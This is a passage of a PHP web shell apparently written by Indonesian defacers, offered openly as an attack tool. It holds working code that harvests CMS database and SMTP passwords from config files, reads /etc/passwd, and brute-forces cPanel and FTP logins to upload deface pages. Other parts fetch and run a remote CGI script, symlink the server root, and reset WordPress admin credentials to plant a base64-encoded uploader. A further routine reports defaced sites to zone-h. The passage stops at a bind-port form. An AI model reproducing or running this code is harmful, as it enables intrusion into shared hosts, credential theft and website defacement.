  2171.                 } elseif(preg_match("/^[client]$/", $ambil)) {
  2172.                     preg_match("/password=(.*?)/", $ambil, $pass1);
  2173.                     if(preg_match('/"/', $pass1[1])) {
  2174.                         $pass1[1] = str_replace('"', "", $pass1[1]);
  2175.                         $pass .= $pass1[1]."\n";
  2176.                     } else {
  2177.                         $pass .= $pass1[1]."\n";
  2178.                     }
  2179.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  2180.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  2181.                 }
  2182.             }
  2183.             echo $pass;
  2184.         }
  2185.         $cp_pass = cp_pass($dir);
  2186.         echo $cp_pass;
  2187.         echo "</textarea><br>
  2188.         <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  2189.         </form>
  2190.         <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  2191.     }
  2192. } elseif($_GET['do'] == 'cpftp_auto') {
  2193.     if($_POST['crack']) {
  2194.         $usercp = explode("\r\n", $_POST['user_cp']);
  2195.         $passcp = explode("\r\n", $_POST['pass_cp']);
  2196.         $i = 0;
  2197.         foreach($usercp as $ucp) {
  2198.             foreach($passcp as $pcp) {
  2199.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
  2200.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  2201.                     } else {
  2202.                         $_SESSION[$ucp] = "1";
  2203.                         $_SESSION[$pcp] = "1";
  2204.                         if($ucp == '' || $pcp == '') {
  2205.                             //
  2206.                         } else {
  2207.                             echo "[+] username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  2208.                             $ftp_conn = ftp_connect($ip);
  2209.                             $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
  2210.                             if((!$ftp_login) || (!$ftp_conn)) {
  2211.                                 echo "[+] <font color=red>Login Gagal</font><br><br>";
  2212.                             } else {
  2213.                                 echo "[+] <font color=lime>Login Sukses</font><br>";
  2214.                                 $fi = htmlspecialchars($_POST['file_deface']);
  2215.                                 $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
  2216.                                 if($deface) {
  2217.                                     $i++;
  2218.                                     echo "[+] <font color=lime>Deface Sukses</font><br>";
  2219.                                     if(function_exists('posix_getpwuid')) {
  2220.                                         $domain_cp = file_get_contents("/etc/named.conf"); 
  2221.                                         if($domain_cp == '') {
  2222.                                             echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  2223.                                         } else {
  2224.                                             preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  2225.                                             foreach($domains_cp[1] as $dj) {
  2226.                                                 $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  2227.                                                 $user_cp_url = $user_cp_url['name'];
  2228.                                                 if($user_cp_url == $ucp) {
  2229.                                                     echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
  2230.                                                     break;
  2231.                                                 }
  2232.                                             }
  2233.                                         }
  2234.                                     } else {
  2235.                                         echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  2236.                                     }
  2237.                                 } else {
  2238.                                     echo "[-] <font color=red>Deface Gagal</font><br><br>";
  2239.                                 }
  2240.                             }
  2241.                             //echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  2242.                         }
  2243.                     }
  2244.                 }
  2245.             }
  2246.         }
  2247.         if($i == 0) {
  2248.         } else {
  2249.             echo "<br>sukses deface ".$i." Cpanel by <font color=lime>N4ST4R_ID</font>";
  2250.         }
  2251.     } else {
  2252.         echo "<center>
  2253.         <form method='post'>
  2254.         Filename: <br>
  2255.         <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
  2256.         Deface Page: <br>
  2257.         <input type='text' name='deface' placeholder='http://www.web-yang-udah-di-deface.com/filemu.php' style='width: 450px;'><br>
  2258.         USER: <br>
  2259.         <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  2260.         $_usercp = fopen("/etc/passwd","r");
  2261.         while($getu = fgets($_usercp)) {
  2262.             if($getu == '' || !$_usercp) {
  2263.                 echo "<font color=red>Can't read /etc/passwd</font>";
  2264.             } else {
  2265.                 preg_match_all("/(.*?):x:/", $getu, $u);
  2266.                 foreach($u[1] as $user_cp) {
  2267.                         if(is_dir("/home/$user_cp/public_html")) {
  2268.                             echo "$user_cp\n";
  2269.                     }
  2270.                 }
  2271.             }
  2272.         }
  2273.         echo "</textarea><br>
  2274.         PASS: <br>
  2275.         <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  2276.         function cp_pass($dir) {
  2277.             $pass = "";
  2278.             $dira = scandir($dir);
  2279.             foreach($dira as $dirb) {
  2280.                 if(!is_file("$dir/$dirb")) continue;
  2281.                 $ambil = file_get_contents("$dir/$dirb");
  2282.                 if(preg_match("/WordPress/", $ambil)) {
  2283.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  2284.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  2285.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
  2286.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  2287.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  2288.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  2289.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
  2290.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  2291.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  2292.                 } elseif(preg_match("/client/", $ambil)) {
  2293.                     preg_match("/password=(.*)/", $ambil, $pass1);
  2294.                     if(preg_match('/"/', $pass1[1])) {
  2295.                         $pass1[1] = str_replace('"', "", $pass1[1]);
  2296.                         $pass .= $pass1[1]."\n";
  2297.                     }
  2298.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  2299.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  2300.                 }
  2301.             }
  2302.             echo $pass;
  2303.         }
  2304.         $cp_pass = cp_pass($dir);
  2305.         echo $cp_pass;
  2306.         echo "</textarea><br>
  2307.         <input type='submit' name='crack' style='width: 450px;' value='Hajar'>
  2308.         </form>
  2309.         <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  2310.     }
  2311. } elseif($_GET['do'] == 'smtp') {
  2312.     echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
  2313.     function scj($dir) {
  2314.         $dira = scandir($dir);
  2315.         foreach($dira as $dirb) {
  2316.             if(!is_file("$dir/$dirb")) continue;
  2317.             $ambil = file_get_contents("$dir/$dirb");
  2318.             $ambil = str_replace("$", "", $ambil);
  2319.             if(preg_match("/JConfig|joomla/", $ambil)) {
  2320.                 $smtp_host = ambilkata($ambil,"smtphost = '","'");
  2321.                 $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
  2322.                 $smtp_user = ambilkata($ambil,"smtpuser = '","'");
  2323.                 $smtp_pass = ambilkata($ambil,"smtppass = '","'");
  2324.                 $smtp_port = ambilkata($ambil,"smtpport = '","'");
  2325.                 $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
  2326.                 echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
  2327.                 echo "SMTP port: <font color=lime>$smtp_port</font><br>";
  2328.                 echo "SMTP user: <font color=lime>$smtp_user</font><br>";
  2329.                 echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
  2330.                 echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
  2331.                 echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
  2332.             }
  2333.         }
  2334.     }
  2335.     $smpt_hunter = scj($dir);
  2336.     echo $smpt_hunter;
  2337. } elseif($_GET['do'] == 'auto_wp') {
  2338.     if($_POST['hajar']) {
  2339.         $title = htmlspecialchars($_POST['new_title']);
  2340.         $pn_title = str_replace(" ", "-", $title);
  2341.         if($_POST['cek_edit'] == "Y") {
  2342.             $script = $_POST['edit_content'];
  2343.         } else {
  2344.             $script = $title;
  2345.         }
  2346.         $conf = $_POST['config_dir'];
  2347.         $scan_conf = scandir($conf);
  2348.         foreach($scan_conf as $file_conf) {
  2349.             if(!is_file("$conf/$file_conf")) continue;
  2350.             $config = file_get_contents("$conf/$file_conf");
  2351.             if(preg_match("/WordPress/", $config)) {
  2352.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
  2353.                 $dbuser = ambilkata($config,"DB_USER', '","'");
  2354.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  2355.                 $dbname = ambilkata($config,"DB_NAME', '","'");
  2356.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
  2357.                 $prefix = $dbprefix."posts";
  2358.                 $option = $dbprefix."options";
  2359.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2360.                 $db = mysql_select_db($dbname);
  2361.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
  2362.                 $result = mysql_fetch_array($q);
  2363.                 $id = $result[ID];
  2364.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  2365.                 $result2 = mysql_fetch_array($q2);
  2366.                 $target = $result2[option_value];
  2367.                 $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
  2368.                 $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
  2369.                 echo "<div style='margin: 5px auto;'>";
  2370.                 if($target == '') {
  2371.                     echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
  2372.                 } else {
  2373.                     echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
  2374.                 }
  2375.                 if(!$update OR !$conn OR !$db) {
  2376.                     echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
  2377.                 } else {
  2378.                     echo "<font color=lime>sukses di ganti.</font><br>";
  2379.                 }
  2380.                 echo "</div>";
  2381.                 mysql_close($conn);
  2382.             }
  2383.         }
  2384.     } else {
  2385.         echo "<center>
  2386.         <h1>Auto Edit Title+Content WordPress</h1>
  2387.         <form method='post'>
  2388.         DIR Config: <br>
  2389.         <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  2390.         Set Title: <br>
  2391.         <input type='text' name='new_title' value='Hacked by N4ST4R_ID' placeholder='New Title'><br><br>
  2392.         Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
  2393.         <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
  2394.         <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
  2395.         <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
  2396.         </form>
  2397.         <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  2398.         ";
  2399.     }
  2400. }elseif($_GET['do'] == 'defacerid') {
  2401. echo "<center><form method='post'>
  2402.         <u>Defacer</u>: <br>
  2403.         <input type='text' name='hekel' size='50' value='N4ST4R_ID'><br>
  2404.         <u>Team</u>: <br>
  2405.         <input type='text' name='tim' size='50' value='Indonesian Error System'><br>
  2406.         <u>Domains</u>: <br>
  2407.         <textarea style='width: 450px; height: 150px;' name='sites'></textarea><br>
  2408.         <input type='submit' name='go' value='Submit' style='width: 450px;'>
  2409.         </form>";
  2410. $site = explode("\r\n", $_POST['sites']);
  2411. $go = $_POST['go'];
  2412. $hekel = $_POST['hekel'];
  2413. $tim = $_POST['tim'];
  2414. if($go) {
  2415. foreach($site as $sites) {
  2416. $zh = $sites;
  2417. $form_url = "https://www.defacer.id/notify";
  2418. $data_to_post = array();
  2419. $data_to_post['attacker'] = "$hekel";
  2420. $data_to_post['team'] = "$tim";
  2421. $data_to_post['poc'] = 'SQL Injection';
  2422. $data_to_post['url'] = "$zh";
  2423. $curl = curl_init();
  2424. curl_setopt($curl,CURLOPT_URL, $form_url);
  2425. curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post));
  2426. curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm)
  2427. curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post);
  2428. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  2429. curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
  2430. $result = curl_exec($curl);
  2431. echo $result;
  2432. curl_close($curl);
  2433. echo "<br>";
  2434. }
  2435. }
  2436. } elseif($_GET['do'] == 'zoneh') {
  2437.     if($_POST['submit']) {
  2438.         $domain = explode("\r\n", $_POST['url']);
  2439.         $nick =  $_POST['nick'];
  2440.         echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  2441.         echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  2442.         function zoneh($url,$nick) {
  2443.             $ch = curl_init("http://www.zone-h.com/notify/single");
  2444.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  2445.                   curl_setopt($ch, CURLOPT_POST, true);
  2446.                   curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  2447.             return curl_exec($ch);
  2448.                   curl_close($ch);
  2449.         }
  2450.         foreach($domain as $url) {
  2451.             $zoneh = zoneh($url,$nick);
  2452.             if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  2453.                 echo "$url -> <font color=lime>OK</font><br>";
  2454.             } else {
  2455.                 echo "$url -> <font color=red>ERROR</font><br>";
  2456.             }
  2457.         }
  2458.     } else {
  2459.         echo "<center><form method='post'>
  2460.         <u>Defacer</u>: <br>
  2461.         <input type='text' name='nick' size='50' value='N4ST4R_ID'><br>
  2462.         <u>Domains</u>: <br>
  2463.         <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  2464.         <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  2465.         </form>";
  2466.     }
  2467.     echo "</center>";
  2468. } elseif($_GET['do'] == 'cgi') {
  2469.     $cgi_dir = mkdir('idx_cgi', 0755);
  2470.     $file_cgi = "idx_cgi/cgi.izo";
  2471.     $isi_htcgi = "AddHandler cgi-script .izo";
  2472.     $htcgi = fopen(".htaccess", "w");
  2473.     $cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg");
  2474.     $cgi = fopen($file_cgi, "w");
  2475.     fwrite($cgi, $cgi_script);
  2476.     fwrite($htcgi, $isi_htcgi);
  2477.     chmod($file_cgi, 0755);
  2478.     echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
  2479. } elseif($_GET['do'] == 'fake_root') {
  2480.     ob_start();
  2481.     $cwd = getcwd();
  2482.     $ambil_user = explode("/", $cwd);
  2483.     $user = $ambil_user[2];
  2484.     if($_POST['reverse']) {
  2485.         $site = explode("\r\n", $_POST['url']);
  2486.         $file = $_POST['file'];
  2487.         foreach($site as $url) {
  2488.             $cek = getsource("$url/~$user/$file");
  2489.             if(preg_match("/hacked/i", $cek)) {
  2490.                 echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
  2491.             }
  2492.         }
  2493.     } else {
  2494.         echo "<center><form method='post'>
  2495.         Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
  2496.         User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
  2497.         Domain: <br>
  2498.         <textarea style='width: 450px; height: 250px;' name='url'>";
  2499.         reverse($_SERVER['HTTP_HOST']);
  2500.         echo "</textarea><br>
  2501.         <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
  2502.         </form><br>
  2503.         NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
  2504.     }
  2505. } elseif($_GET['do'] == 'symlink') {
  2506.  
  2507. @set_time_limit(0);
  2508.  
  2509. echo "<br><br><center><h1>+--=[ Symlink ]=--+</h1></center><br><br><center><div class=content>";
  2510.  
  2511. @mkdir('sym',0777);
  2512. $htaccess  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  2513. $write =@fopen ('sym/.htaccess','w');
  2514. fwrite($write ,$htaccess);
  2515. @symlink('/','sym/root');
  2516. $filelocation = basename(__FILE__);
  2517. $read_named_conf = @file('/etc/named.conf');
  2518. if(!$read_named_conf)
  2519. {
  2520. echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
  2521. }
  2522. else
  2523. {
  2524. echo "<br><br><div class='tmp'><table border='1' bordercolor='#00ff00' width='500' cellpadding='1' cellspacing='0'><td>Domains</td><td>Users</td><td>symlink </td>";
  2525. foreach($read_named_conf as $subject){
  2526. if(eregi('zone',$subject)){
  2527. preg_match_all('#zone "(.*)"#',$subject,$string);
  2528. flush();
  2529. if(strlen(trim($string[1][0])) >2){
  2530. $UID = posix_getpwuid(@fileowner('/etc/valiases/'.$string[1][0]));
  2531. $name = $UID['name'] ;
  2532. @symlink('/','sym/root');
  2533. $name   = $string[1][0];
  2534. $iran   = '\.ir';
  2535. $israel = '\.il';
  2536. $indo   = '\.id';
  2537. $sg12   = '\.sg';
  2538. $edu    = '\.edu';
  2539. $gov    = '\.gov';
  2540. $gose   = '\.go';
  2541. $gober  = '\.gob';
  2542. $mil1   = '\.mil';
  2543. $mil2   = '\.mi';
  2544. $malay  = '\.my';
  2545. $china  = '\.cn';
  2546. $japan  = '\.jp';
  2547. $austr  = '\.au';
  2548. $porn   = '\.xxx';
  2549. $as     = '\.uk';
  2550. $calfn  = '\.ca';
  2551.  
  2552. if (eregi("$iran",$string[1][0]) or eregi("$israel",$string[1][0]) or eregi("$indo",$string[1][0])or eregi("$sg12",$string[1][0]) or eregi ("$edu",$string[1][0]) or eregi ("$gov",$string[1][0])
  2553. or eregi ("$gose",$string[1][0]) or eregi("$gober",$string[1][0]) or eregi("$mil1",$string[1][0]) or eregi ("$mil2",$string[1][0])
  2554. or eregi ("$malay",$string[1][0]) or eregi("$china",$string[1][0]) or eregi("$japan",$string[1][0]) or eregi ("$austr",$string[1][0])
  2555. or eregi("$porn",$string[1][0]) or eregi("$as",$string[1][0]) or eregi ("$calfn",$string[1][0]))
  2556. {
  2557. $name = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$string[1][0].'</div>';
  2558. }
  2559. echo "
  2560. <tr>
  2561.  
  2562. <td>
  2563. <div class='dom'><a target='_blank' href=http://www.".$string[1][0].'/>'.$name.' </a> </div>
  2564. </td>
  2565.  
  2566. <td>
  2567. '.$UID['name']."
  2568. </td>
  2569.  
  2570. <td>
  2571. <a href='sym/root/home/".$UID['name']."/public_html' target='_blank'>Symlink </a>
  2572. </td>
  2573.  
  2574. </tr></div> ";
  2575. flush();
  2576. }
  2577. }
  2578. }
  2579. }
  2580.  
  2581. echo "</center></table>";  
  2582.  
  2583. }   elseif($_GET['do'] == 'adminer') {
  2584.     $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  2585.     function adminer($url, $isi) {
  2586.         $fp = fopen($isi, "w");
  2587.         $ch = curl_init();
  2588.               curl_setopt($ch, CURLOPT_URL, $url);
  2589.               curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  2590.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  2591.               curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  2592.               curl_setopt($ch, CURLOPT_FILE, $fp);
  2593.         return curl_exec($ch);
  2594.               curl_close($ch);
  2595.         fclose($fp);
  2596.         ob_flush();
  2597.         flush();
  2598.     }
  2599.     if(file_exists('adminer.php')) {
  2600.         echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  2601.     } else {
  2602.         if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  2603.             echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  2604.         } else {
  2605.             echo "<center><font color=red>gagal buat file adminer</font></center>";
  2606.         }
  2607.     }
  2608. } elseif($_GET['do'] == 'auto_dwp') {
  2609.     if($_POST['auto_deface_wp']) {
  2610.         function anucurl($sites) {
  2611.             $ch = curl_init($sites);
  2612.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2613.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2614.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  2615.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  2616.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  2617.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  2618.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  2619.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  2620.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  2621.             $data = curl_exec($ch);
  2622.                   curl_close($ch);
  2623.             return $data;
  2624.         }
  2625.         function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  2626.             $post = array(
  2627.                    "log" => "$userr",
  2628.                    "pwd" => "$pass",
  2629.                    "rememberme" => "forever",
  2630.                    "wp-submit" => "$wp_submit",
  2631.                    "redirect_to" => "$web",
  2632.                    "testcookie" => "1",
  2633.                    );
  2634.             $ch = curl_init($cek);
  2635.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2636.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2637.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  2638.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  2639.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  2640.                   curl_setopt($ch, CURLOPT_POST, 1);
  2641.                   curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  2642.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  2643.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  2644.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  2645.             $data = curl_exec($ch);
  2646.                   curl_close($ch);
  2647.             return $data;
  2648.         }
  2649.         $scan = $_POST['link_config'];
  2650.         $link_config = scandir($scan);
  2651.         $script = htmlspecialchars($_POST['script']);
  2652.         $user = "global";
  2653.         $pass = "global";
  2654.         $passx = md5($pass);
  2655.         foreach($link_config as $dir_config) {
  2656.             if(!is_file("$scan/$dir_config")) continue;
  2657.             $config = file_get_contents("$scan/$dir_config");
  2658.             if(preg_match("/WordPress/", $config)) {
  2659.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
  2660.                 $dbuser = ambilkata($config,"DB_USER', '","'");
  2661.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  2662.                 $dbname = ambilkata($config,"DB_NAME', '","'");
  2663.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
  2664.                 $prefix = $dbprefix."users";
  2665.                 $option = $dbprefix."options";
  2666.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2667.                 $db = mysql_select_db($dbname);
  2668.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  2669.                 $result = mysql_fetch_array($q);
  2670.                 $id = $result[ID];
  2671.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  2672.                 $result2 = mysql_fetch_array($q2);
  2673.                 $target = $result2[option_value];
  2674.                 if($target == '') {                
  2675.                     echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  2676.                 } else {
  2677.                     echo "[+] $target <br>";
  2678.                 }
  2679.                 $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  2680.                 if(!$conn OR !$db OR !$update) {
  2681.                     echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  2682.                     mysql_close($conn);
  2683.                 } else {
  2684.                     $site = "$target/wp-login.php";
  2685.                     $site2 = "$target/wp-admin/theme-install.php?upload";
  2686.                     $b1 = anucurl($site2);
  2687.                     $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  2688.                     $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  2689.                     $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  2690.                     $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  2691.                     $www = "m.php";
  2692.                     $fp5 = fopen($www,"w");
  2693.                     fputs($fp5,$upload3);
  2694.                     $post2 = array(
  2695.                             "_wpnonce" => "$anu2",
  2696.                             "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  2697.                             "themezip" => "@$www",
  2698.                             "install-theme-submit" => "Install Now",
  2699.                             );
  2700.                     $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  2701.                           curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2702.                           curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2703.                           curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  2704.                           curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  2705.                           curl_setopt($ch, CURLOPT_POST, 1);
  2706.                           curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  2707.                           curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  2708.                           curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  2709.                           curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  2710.                     $data3 = curl_exec($ch);
  2711.                           curl_close($ch);
  2712.                     $y = date("Y");
  2713.                     $m = date("m");
  2714.                     $namafile = "id.php";
  2715.                     $fpi = fopen($namafile,"w");
  2716.                     fputs($fpi,$script);
  2717.                     $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  2718.                            curl_setopt($ch6, CURLOPT_POST, true);
  2719.                            curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  2720.                            curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  2721.                            curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  2722.                            curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  2723.                            curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
  2724.                     $postResult = curl_exec($ch6);
  2725.                            curl_close($ch6);
  2726.                     $as = "$target/k.php";
  2727.                     $bs = anucurl($as);
  2728.                     if(preg_match("#$script#is", $bs)) {
  2729.                         echo "[+] <font color='lime'>berhasil mepes...</font><br>";
  2730.                         echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  2731.                         } else {
  2732.                         echo "[-] <font color='red'>gagal mepes...</font><br>";
  2733.                         echo "[!!] coba aja manual: <br>";
  2734.                         echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  2735.                         echo "[+] username: <font color=lime>$user</font><br>";
  2736.                         echo "[+] password: <font color=lime>$pass</font><br><br>";    
  2737.                         }
  2738.                     mysql_close($conn);
  2739.                 }
  2740.             }
  2741.         }
  2742.     } else {
  2743.         echo "<center><h1>WordPress Auto Deface</h1>
  2744.         <form method='post'>
  2745.         <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
  2746.         <input type='text' name='script' height='10' size='50' placeholder='Hacked by Crystalesia' required><br>
  2747.         <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  2748.         </form>
  2749.         <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
  2750.         </center>";
  2751.     }
  2752. } elseif($_GET['do'] == 'network') {
  2753.     echo "<form method='post'>
  2754.     <u>Bind Port:</u> <br>
  2755.     PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
  2756.     <input type='submit' name='sub_bp' value='>>'>
